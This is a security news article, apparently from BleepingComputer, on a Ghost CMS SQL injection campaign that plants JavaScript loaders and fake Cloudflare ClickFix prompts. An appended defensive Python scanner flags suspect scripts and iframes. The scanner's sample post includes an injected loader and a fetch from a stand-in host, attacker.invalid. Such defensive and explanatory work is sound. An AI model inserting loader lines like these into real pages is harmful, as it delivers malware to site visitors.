Exploiting a Critical Vulnerability
A widespread cyber attack is leveraging a critical SQL injection vulnerability in the Ghost CMS platform to inject malicious JavaScript code onto websites. The campaign, identified by researchers at Chinese cybersecurity firm Qianxin’s XLab, has impacted over 700 domains. Compromised sites include prominent university portals, media outlets, AI and SaaS companies, fintech platforms, and security blogs, with specific breaches reported at Harvard University, Oxford University, Auburn University, and DuckDuckGo.
The vulnerability affects Ghost CMS versions from 3.24.0 through 6.19.0. It allows unauthenticated attackers to read arbitrary data from the website database, including admin API keys. These keys grant full management access to users, articles, and themes, enabling attackers to modify content. While a fix was released on February 19 in version 6.19.1, many site administrators have failed to apply the security update, leaving their systems exposed.
How the Attack Chain Works
The attack begins by exploiting the SQL injection flaw to steal admin API keys. Attackers then use these elevated privileges to inject a lightweight JavaScript loader into article pages. This loader fetches second-stage code from the attacker’s infrastructure, which acts as a cloaking script to fingerprint visitors and identify valid targets.
Visitors who pass the verification are presented with a fake Cloudflare verification prompt loaded via an iframe. This prompt uses a ClickFix lure, instructing victims to prove they are human by pasting a provided command into their Windows command prompt. Executing the command drops a payload onto the victim’s system. Researchers have observed multiple payload types in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample identified as UtilifySetup.exe. At least two distinct activity clusters have been targeting vulnerable Ghost sites, with attackers sometimes cleaning the scripts of rivals to inject their own, or re-infecting the same domains after cleanup.
Protection and Mitigation
The primary recommendation for Ghost CMS administrators is to upgrade to version 6.19.1 or later immediately. All previously used API keys should be rotated, as they may have been compromised. A thorough review of websites is necessary to locate and remove any injected scripts. XLab has provided a list of indicators of compromise to assist with this process. Additionally, maintaining a 30-day record of admin API call logs is advised to enable reliable retrospective investigations.
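The following is an added example written for this page, not code from the article, XLab, or the Ghost project: a small defender-side audit helper that checks whether an installed Ghost version falls inside the affected range named above (3.24.0 through 6.19.0) and scans the HTML of a post (as exported from Ghost or returned by its Content API) for script tags loading from hosts outside an allowlist and for iframe elements, the two places where the injected loader and the fake verification prompt would appear. All hostnames, the sample post, and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

AFFECTED_MIN = (3, 24, 0)  # first affected release named in the article
AFFECTED_MAX = (6, 19, 0)  # last affected release; 6.19.1 carries the fix

def parse_version(text: str) -> tuple:
    return tuple(int(p) for p in text.lstrip("v").split(".")[:3])  # 'v6.19.1' -> (6, 19, 1)

def is_affected_version(text: str) -> bool:
    """True when the installed Ghost version lies inside the affected range."""
    return AFFECTED_MIN <= parse_version(text) <= AFFECTED_MAX

class _InjectScanner(HTMLParser):
    """Collects script and iframe tags that a clean article should not carry."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            src = attrs.get("src")
            host = urlparse(src).hostname if src else None
            if src is None:
                self.findings.append(("inline-script", None))
            elif host is not None and host not in self.allowed_hosts:
                # Relative (same-origin) scripts are left to the theme review.
                self.findings.append(("external-script", src))
        elif tag == "iframe":
            self.findings.append(("iframe", attrs.get("src")))

def find_injected_content(html: str, allowed_hosts) -> list:
    """Return (kind, src) findings for one article's HTML body, for review."""
    scanner = _InjectScanner(allowed_hosts)
    scanner.feed(html)
    return scanner.findings

# Constructed sample: one legitimate theme script, then an injected loader,
# an inline second-stage fetch, and an iframe carrying a fake prompt.
SAMPLE_POST = (
    "<p>Welcome to our blog.</p>"
    '<script src="https://cdn.example-blog.test/theme.js"></script>'
    '<script src="https://attacker.invalid/loader.js"></script>'
    '<script>fetch("https://attacker.invalid/stage2")</script>'
    '<iframe src="https://attacker.invalid/verify.html"></iframe>'
)
```

Run `find_injected_content` over every post body with your theme's CDN hosts in the allowlist; each finding is a candidate for manual removal, and a hit on a site still running an affected version should also trigger the key rotation described above.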
Source: BleepingComputer
